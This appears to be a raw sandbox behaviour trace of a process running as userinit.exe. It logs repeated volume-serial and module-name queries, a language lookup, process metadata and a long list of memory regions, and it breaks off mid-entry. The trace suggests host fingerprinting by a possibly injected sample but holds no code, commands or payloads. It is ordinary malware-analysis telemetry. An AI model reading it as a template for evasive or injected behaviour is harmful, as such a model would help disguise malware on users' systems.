[0179.975] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x20ea04, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x20ea18, lpMaximumComponentLength=0x20ea14, lpFileSystemFlags=0x20ea10, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x20ea18*=0x90c08a66, lpMaximumComponentLength=0x20ea14*=0xff, lpFileSystemFlags=0x20ea10*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0179.976] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x20e908, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0179.976] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x20ea04, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x20ea18, lpMaximumComponentLength=0x20ea14, lpFileSystemFlags=0x20ea10, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x20ea18*=0x90c08a66, lpMaximumComponentLength=0x20ea14*=0xff, lpFileSystemFlags=0x20ea10*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0179.976] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x20e908, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0179.976] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x20ea04, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x20ea18, lpMaximumComponentLength=0x20ea14, lpFileSystemFlags=0x20ea10, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x20ea18*=0x90c08a66, lpMaximumComponentLength=0x20ea14*=0xff, lpFileSystemFlags=0x20ea10*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0179.976] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x20e908, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0179.976] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x20ea04, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x20ea18, lpMaximumComponentLength=0x20ea14, lpFileSystemFlags=0x20ea10, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x20ea18*=0x90c08a66, lpMaximumComponentLength=0x20ea14*=0xff, lpFileSystemFlags=0x20ea10*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0179.976] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x20e908, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0179.976] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x20ea04, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x20ea18, lpMaximumComponentLength=0x20ea14, lpFileSystemFlags=0x20ea10, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x20ea18*=0x90c08a66, lpMaximumComponentLength=0x20ea14*=0xff, lpFileSystemFlags=0x20ea10*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0179.977] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x20e908, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0179.977] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x20ea04, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x20ea18, lpMaximumComponentLength=0x20ea14, lpFileSystemFlags=0x20ea10, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x20ea18*=0x90c08a66, lpMaximumComponentLength=0x20ea14*=0xff, lpFileSystemFlags=0x20ea10*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0179.977] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x20e908, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0179.977] GetSystemDefaultLangID () returned 0x900409
[0179.977] VerLanguageNameA (in: wLang=0x409, szLang=0x20e9bc, cchLang=0x64 | out: szLang="English (United States)") returned 0x17
[0179.978] ExitProcess (uExitCode=0x0)
Thread:
id = 289
os_tid = 0x668
Thread:
id = 290
os_tid = 0x620
Process:
id = "47"
image_name = "userinit.exe"
filename = "c:\\windows\\system32\\userinit.exe"
page_root = "0x7f1be8c0"
os_pid = "0x1c0"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "24"
os_parent_pid = "0xf0c"
cmd_line = "\"C:\\Windows\\System32\\userinit.exe\""
cur_dir = "C:\\Windows\\system32\\"
os_username = "CRH2YWU7\\EEBsYm5"
os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ed0e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 5512
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 5513
start_va = 0x30000
end_va = 0x6ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 5514
start_va = 0x70000
end_va = 0x73fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000070000"
filename = ""
Region:
id = 5515
start_va = 0x80000
end_va = 0x80fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000080000"
filename = ""
Region:
id = 5516
start_va = 0x400000
end_va = 0x462fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 5517
start_va = 0x6f0000
end_va = 0x6f8fff
entry_point = 0x6f0000
region_type = mapped_file
name = "userinit.exe"
filename = "\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")
Region:
id = 5518
start_va = 0x76f20000
end_va = 0x7705bfff
entry_point = 0x76f20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 5519
start_va = 0x77160000
end_va = 0x77160fff
entry_point = 0x77160000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 5520
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 5521
start_va = 0x7ffde000
end_va = 0x7ffdefff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffde000"
filename = ""
Region:
id = 5522
start_va = 0x7ffdf000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdf000"
filename = ""
Region:
id = 5523
start_va = 0x1e0000
end_va = 0x2dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000001e0000"
filename = ""
Region:
id = 5524
start_va = 0x75320000
end_va = 0x75369fff
entry_point = 0x75320000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 5525
start_va = 0x75370000
end_va = 0x75443fff
entry_point = 0x75370000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 5526
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 5527
start_va = 0x90000
end_va = 0xf6fff
entry_point = 0x90000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 5528
start_va = 0x640000
end_va = 0x64ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000640000"
filename = ""
Region:
id = 5529
start_va = 0x6d7b0000
end_va = 0x6d833fff
entry_point = 0x6d7b0000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll")
Region:
id = 5530
start_va = 0x745c0000
end_va = 0x745c8fff
entry_point = 0x745c0000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 5531
start_va = 0x754b0000
end_va = 0x754b9fff
entry_point = 0x754b0000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 5532
start_va = 0x75700000
end_va = 0x757abfff
entry_point = 0x75700000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 5533
start_va = 0x757b0000
end_va = 0x75878fff
entry_point = 0x757b0000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 5534
start_va = 0x75880000
end_va = 0x758cdfff
entry_point = 0x75880000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 5535
start_va = 0x758d0000
end_va = 0x758e8fff
entry_point = 0x758d0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 5536
start_va = 0x758f0000
end_va = 0x7597efff
entry_point = 0x758f0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 5537
start_va = 0x75bc0000
end_va = 0x75c5cfff
entry_point = 0x75bc0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 5538
start_va = 0x76a20000
end_va = 0x76b7bfff
entry_point = 0x76a20000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 5539
start_va = 0x76da0000
end_va = 0x76e3ffff
entry_point = 0x76da0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 5540
start_va = 0x76e60000
end_va = 0x76f00fff
entry_point = 0x76e60000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 5541
start_va = 0x7f6f0000
end_va = 0x7f7effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007f6f0000"
filename = ""
Region:
id = 5542
start_va = 0x100000
end_va = 0x1c7fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000100000"
filename = ""
Region:
id = 5543
start_va = 0x759b0000
end_va = 0x75a7bfff
entry_point = 0x759b0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 5544
start_va = 0x76e40000
end_va = 0x76e5efff
entry_point = 0x76e40000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 5552
start_va = 0x20000
end_va = 0x20fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 5553
start_va = 0x1d0000
end_va = 0x1d0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 5554
start_va = 0x2e0000
end_va = 0x3e0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000002e0000"
filename = ""
Region:
id = 5555
start_va = 0x510000
end_va = 0x51ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000510000"
filename = ""
Region:
id = 5556
start_va = 0x700000
end_va = 0x12fffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000700000"
filename = ""
Region:
id = 5557
start_va = 0x520000
end_va = 0x61ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000520000"
filename = ""
Region:
id = 5558
start_va = 0x736a0000
end_va = 0x736dffff
entry_point = 0x736a0000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 5559
start_va = 0x1300000
end_va = 0x146ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001300000"
filename = ""
Region:
id = 5563
start_va = 0x1300000
end_va = 0x13defff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001300000"
filename = ""
Region:
id = 5564
start_va = 0x1430000
end_va = 0x146ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001430000"
filename = ""
Region:
id = 5565
start_va = 0x3f0000
end_va = 0x3f0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000003f0000"
filename = ""
Region:
id = 5566
start_va = 0x733b0000
end_va = 0x733c2fff
entry_point = 0x733b0000
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Region:
id = 5567
start_va = 0x470000
end_va = 0x4bffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000470000"
filename = ""
Region:
id = 5568
start_va = 0x1470000
end_va = 0x1d9ffff
entry_point = 0x1470000
region_type = mapped_file
name = "staticcache.dat"
filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat")
Region:
id = 5569
start_va = 0x470000
end_va = 0x476fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000470000"
filename = ""
Region:
id = 5570
start_va = 0x480000
end_va = 0x4bffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000480000"
filename = ""
Region:
id = 5571
start_va = 0x4c0000
end_va = 0x4c1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000004c0000"
filename = ""
Region:
id = 5572
start_va = 0x1da0000
end_va = 0x2192fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001da0000"
filename = ""
Region:
id = 5573
start_va = 0x650000
end_va = 0x6cffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000650000"
filename = ""
Region:
id = 5574
start_va = 0x21a0000
end_va = 0x22acfff
entry_point = 0x0
region_type = private
name = "private_0x00000000021a0000"
filename = ""
Region:
id = 5578
start_va = 0x22b0000
end_va = 0x23affff
entry_point = 0x0
region_type = private
name = "private_0x00000000022b0000"
filename = ""
Region:
id = 5582
start_va = 0x23b0000
end_va = 0x25affff
entry_point = 0x0
region_type = private
name = "private_0x00000000023b0000"
filename = ""
Region:
id = 5583
start_va = 0x25b0000
end_va = 0x2630fff
entry_point = 0x0
region_type = private
name = "private_0x00000000025b0000"
filename = ""
Region:
id = 5587
start_va = 0x2640000
end_va = 0x26c2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002640000"
filename = ""
Region:
id = 5588
start_va = 0x25b0000
end_va = 0x2634fff
entry_point = 0x0
region_type = private
name = "private_0x00000000025b0000"
filename = ""
Region:
id = 5589
start_va = 0x2640000
end_va = 0x26c6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002640000"
filename = ""
Region:
id = 5590
start_va = 0x25b0000
end_va = 0x2638fff
entry_point = 0x0
region_type = private
name = "private_0x00000000025b0000"
filename = ""
Region:
id = 5594
start_va = 0x2640000
end_va = 0x26cafff
entry_point = 0x0
region_type = private
name = "private_0x0000000002640000"
filename = ""
Region:
id = 5595
start_va = 0x25b0000
end_va = 0x263cfff
entry_point = 0x0
region_type = private
name = "private_0x00000000025b0000"
filename = ""
Region:
id = 5596
start_va = 0x2640000
end_va = 0x26cefff
entry_point = 0x0
region_type = private
name = "private_0x0000000002640000"
filename = ""
Region:
id = 5597
start_va = 0x26d0000
end_va = 0x2760fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026d0000"
filename = ""
Region:
id = 5599
start_va = 0x25b0000
end_va = 0x2642fff
entry_point = 0x0
region_type = private
name = "private_0x00000000025b0000"
filename = ""
Region:
id = 5600
start_va = 0x2650000
end_va = 0x26e4fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002650000"
filename = ""
Region:
id = 5601
start_va = 0x25b0000
end_va = 0x2646fff
entry_point = 0x0
region_type = private
name = "private_0x00000000025b0000"
filename = ""
Region:
id = 5602
start_va = 0x2650000
end_va = 0x26e8fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002650000"
filename = ""
Region:
id = 5605
start_va = 0x25b0000
end_va = 0x264afff
entry_point = 0x0
region_type = private
name = "private_0x00000000025b0000"
filename = ""
Region:
id = 5606
start_va = 0x2650000
end_va = 0x26ecfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002650000"
filename = ""
Region:
id = 5607
start_va = 0x25b0000
end_va = 0x264efff
entry_point = 0x0
region_type = private
name = "private_0x00000000025b0000"
filename = ""
Region:
id = 5608
start_va = 0x2650000
end_va = 0x26f0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002650000"
filename = ""
Region:
id = 5612
start_va = 0x2700000
end_va = 0x27a2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002700000"
filename = ""
Region:
id = 5613
start_va = 0x25b0000
end_va = 0x2654fff
entry_point = 0x0
region_type = private
name = "private_0x00000000025b0000"
filename = ""
Region:
id = 5614
start_va = 0x2660000
end_va = 0x2706fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002660000"
filename = ""
Region:
id = 5615
start_va = 0x25b0000
end_va = 0x2658fff
entry_point = 0x0
region_type = private
name = "private_0x00000000025b0000"
filename = ""
Region:
id = 5619
start_va = 0x2660000
end_va = 0x270afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002660000"
filename = ""
Region:
id = 5620
start_va = 0x25b0000
end_va = 0x265cfff
entry_point = 0x0
region_type = private
name = "private_0x00000000025b0000"
filename = ""
Region:
id = 5621
start_va = 0x2660000
end_va = 0x270efff
entry_point = 0x0
region_type = private
name = "private_0x0000000002660000"
filename = ""
Region:
id = 5622
start_va = 0x2710000
end_va = 0x27c0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002710000"
filename = ""
Region:
id = 5625
start_va = 0x25b0000
end_va = 0x2662fff
entry_point = 0x0
region_type = private
name = "private_0x00000000025b0000"
filename = ""
Region:
id = 5626
start_va = 0x2670000
end_va = 0x2724fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002670000"
filename = ""
Region:
id = 5627
start_va = 0x25b0000
end_va = 0x2666fff
entry_point = 0x0
region_type = private
name = "private_0x00000000025b0000"
filename = ""
Region:
id = 5628
start_va = 0x2670000
end_va = 0x2728fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002670000"
filename = ""
Region:
id = 5632
start_va = 0x25b0000
end_va = 0x266afff
entry_point = 0x0
region_type = private
name = "private_0x00000000025b0000"
filename = ""
Region:
id = 5633
start_va = 0x2670000
end_va = 0x272cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002670000"
filename = ""
Region:
id = 5634
start_va = 0x25b0000
end_va = 0x266efff
entry_point = 0x0
region_type = private
name = "private_0x00000000025b0000"
filename = ""
Region:
id = 5637
start_va = 0x2670000
end_va = 0x2730fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002670000"
filename = ""
Region:
id = 5638
start_va = 0x2740000
end_va = 0x2802fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002740000"
filename = ""
Region:
id = 5639
start_va = 0x25b0000
end_va = 0x2674fff
entry_point = 0x0
region_type = private
name = "private_0x00000000025b0000"
filename = ""
Region:
id = 5656
start_va = 0x2680000
end_va = 0x2746fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002680000"
filename = ""
Region:
id = 5657
start_va = 0x25b0000
end_va = 0x2678fff
entry_point = 0x0
region_type = private
name = "private_0x00000000025b0000"
filename = ""
Region:
id = 5658
start_va = 0x2680000
end_va = 0x274afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002680000"
filename = ""
Region:
id = 5659
start_va = 0x25b0000
end_va = 0x267cfff
entry_point = 0x0
region_type = private
name = "private_0x00000000025b0000"
filename = ""
Region:
id = 5660
start_va = 0x2680000
end_va = 0x274efff
entry_point = 0x0
region_type = private
name = "private_0x0000000002680000"
filename = ""
Region:
id = 5661
start_va = 0x2750000
end_va = 0x2820fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002750000"
filename = ""
Region:
id = 5667
start_va = 0x25b0000
end_va = 0x2682fff
entry_point = 0x0
region_type = private
name = "private_0x00000000025b0000"
filename = ""
Region:
id = 5668
start_va = 0x2690000
end_va = 0x2764fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002690000"
filename = ""
Region:
id = 5669
start_va = 0x25b0000
end_va = 0x2686fff
entry_point = 0x0
region_type = private
name = "private_0x00000000025b0000"
filename = ""
Region:
id = 5684
start_va = 0x2690000
end_va = 0x2768fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002690000"
filename = ""
Region:
id = 5685
start_va = 0x25b0000
end_va = 0x268afff
entry_point = 0x0
region_type = private
name = "private_0x00000000025b0000"
filename = ""
Region:
id = 5686
start_va = 0x2690000
end_va = 0x276cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002690000"
filename = ""
Region:
id = 5696
start_va = 0x25b0000
end_va = 0x268efff
entry_point = 0x0
region_type = private
name = "private_0x00000000025b0000"
filename = ""
Region:
id = 5697
start_va = 0x2690000
end_va = 0x2770fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002690000"
filename = ""
Region:
id = 5698
start_va = 0x2780000
end_va = 0x2862fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 5699
start_va = 0x25b0000
end_va = 0x2694fff
entry_point = 0x0
region_type = private
name = "private_0x00000000025b0000"
filename = ""
Region:
id = 5700
start_va = 0x26a0000
end_va = 0x2786fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026a0000"
filename = ""
Region:
id = 5701
start_va = 0x25b0000
end_va = 0x2698fff
entry_point = 0x0
region_type = private
name = "private_0x00000000025b0000"
filename = ""
Region:
id = 5702
start_va = 0x26a0000
end_va = 0x278afff
entry_point = 0x0
region_type = private
name = "private_0x00000000026a0000"
filename = ""
Region:
id = 5703
start_va = 0x25b0000
end_va = 0x269cfff
entry_point = 0x0
region_type = private
name = "private_0x00000000025b0000"
filename = ""
Region:
id = 5704
start_va = 0x26a0000
end_va = 0x278efff
entry_point = 0x0
region_type = private
name = "private_0x00000000026a0000"
filename = ""
Region:
id = 5705
start_va = 0x2790000
end_va = 0x2880fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002790000"
filename = ""
Region:
id = 5706
start_va = 0x25b0000
end_va = 0x26a2fff
entry_point = 0x0
region_type = private
name = "private_0x00000000025b0000"
filename = ""
Region:
id = 5707
start_va = 0x26b0000
end_va = 0x27a4fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026b0000"
filename = ""
Region:
id = 5708
start_va = 0x25b0000
end_va = 0x26a6fff
entry_point = 0x0
region_type = private
name = "private_0x00000000025b0000"
filename = ""
Region:
id = 5709
start_va = 0x26b0000
end_va = 0x27a8fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026b0000"
filename = ""
Region:
id = 5710
start_va = 0x25b0000
end_va = 0x26aafff
entry_point = 0x0
region_type = private
name = "private_0x00000000025b0000"
filename = ""
Region:
id = 5711
start_va = 0x26b0000
end_va = 0x27acfff
entry_point = 0x0
region_type = private
name = "private_0x00000000026b0000"
filename = ""
Region:
id = 5712
start_va = 0x25b0000
end_va = 0x26aefff
entry_point = 0x0
region_type = private
name = "private_0x00000000025b0000"
filename = ""
Region:
id = 5713
start_va = 0x26b0000
end_va = 0x27b0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026b0000"
filename = ""
Region:
id = 5714
start_va = 0x27c0000
end_va = 0x28c2fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027c0000"
filename = ""
Region:
id = 5715
start_va = 0x25b0000
end_va = 0x26b4fff
entry_point = 0x0
region_type = private
name = "private_0x00000000025b0000"
filename = ""
Region:
id = 5716
start_va = 0x26c0000
end_va = 0x27c6fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026c0000"
filename = ""
Region:
id = 5717
start_va = 0x25b0000
end_va = 0x26b8fff
entry_point = 0x0
region_type = private
name = "private_0x00000000025b0000"
filename = ""
Region:
id = 5718
start_va = 0x26c0000
end_va = 0x27cafff
entry_point = 0x0
region_type = private
name = "private_0x00000000026c0000"
filename = ""
Region:
id = 5719
start_va = 0x25b0000
end_va = 0x26bcfff
entry_point = 0x0
region_type = private
name = "private_0x00000000025b0000"
filename = ""
Region:
id = 5720
start_va = 0x26c0000
end_va = 0x27cffff
entry_point = 0x0
region_type = private
name = "private_0x00000000026c0000"
filename = ""
Region:
id = 5721
start_va = 0x27d0000
end_va = 0x28e2fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027d0000"
filename = ""
Region:
id = 5722
start_va = 0x750e0000
end_va = 0x750ebfff
entry_point = 0x750e0000
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 5723
start_va = 0x751b0000
end_va = 0x752ccfff
entry_point = 0x751b0000
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 5724
start_va = 0x754c0000
end_va = 0x756bafff
entry_point = 0x754c0000
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 5725
start_va = 0x75a80000
end_va = 0x75bb5fff
entry_point = 0x75a80000
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")
Region:
id = 5726
start_va = 0x768c0000
end_va = 0x76916fff
entry_point = 0x768c0000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 5727
start_va = 0x76920000
end_va = 0x76a14fff
entry_point = 0x76920000
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")
Region:
id = 5728
start_va = 0x71bf0000
end_va = 0x71c2bfff
entry_point = 0x71bf0000
region_type = mapped_file
name = "oleacc.dll"
filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll")
Region:
id = 5729
start_va = 0x4d0000
end_va = 0x4d0fff
entry_point = 0x4d0000
region_type = mapped_file
name = "oleaccrc.dll"
filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll")
Region:
id = 5730
start_va = 0x28f0000
end_va = 0x29effff
entry_point = 0x0
region_type = private
name = "private_0x00000000028f0000"
filename = ""
Region:
id = 5731
start_va = 0x4e0000
end_va = 0x4e0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000004e0000"
filename = ""
Region:
id = 5732
start_va = 0x6d770000
end_va = 0x6d788fff
entry_point = 0x6d770000
region_type = mapped_file
name = "olepro32.dll"
filename = "\\Windows\\System32\\olepro32.dll" (normalized: "c:\\windows\\system32\\olepro32.dll")
Region:
id = 5733
start_va = 0x73b10000
end_va = 0x73b20fff
entry_point = 0x73b10000
region_type = mapped_file
name = "netapi32.dll"
filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")
Region:
id = 5734
start_va = 0x73b00000
end_va = 0x73b08fff
entry_point = 0x73b00000
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 5735
start_va = 0x74f10000
end_va = 0x74f28fff
entry_point = 0x74f10000
region_type = mapped_file
name = "srvcli.dll"
filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")
Region:
id = 5736
start_va = 0x73af0000
